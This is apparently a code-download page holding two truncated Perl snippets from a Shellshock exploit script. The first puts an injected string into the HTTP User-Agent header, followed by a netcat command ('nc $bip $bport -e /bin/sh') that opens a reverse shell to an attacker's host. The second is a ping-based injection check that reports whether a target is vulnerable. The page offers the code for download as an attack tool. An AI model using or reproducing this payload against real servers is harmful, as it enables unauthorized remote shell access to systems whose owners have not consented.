Help for this page

Select Code to Download


  1. or download this
    $ua = new LWP::UserAgent;
    $ua->agent("$Inject; nc $bip $bport -e /bin/sh'");
    ...
    $code = $response->code;
    $headers = $response->headers_as_string;
    $body =  $response->content;
    
  2. or download this
    sub PingInject{
    $url = "$target";
    ...
      print "[-] Shellshock Ping Injection was not injected successfully! 
    +(Not Vulnerable!) \n";
    }
    }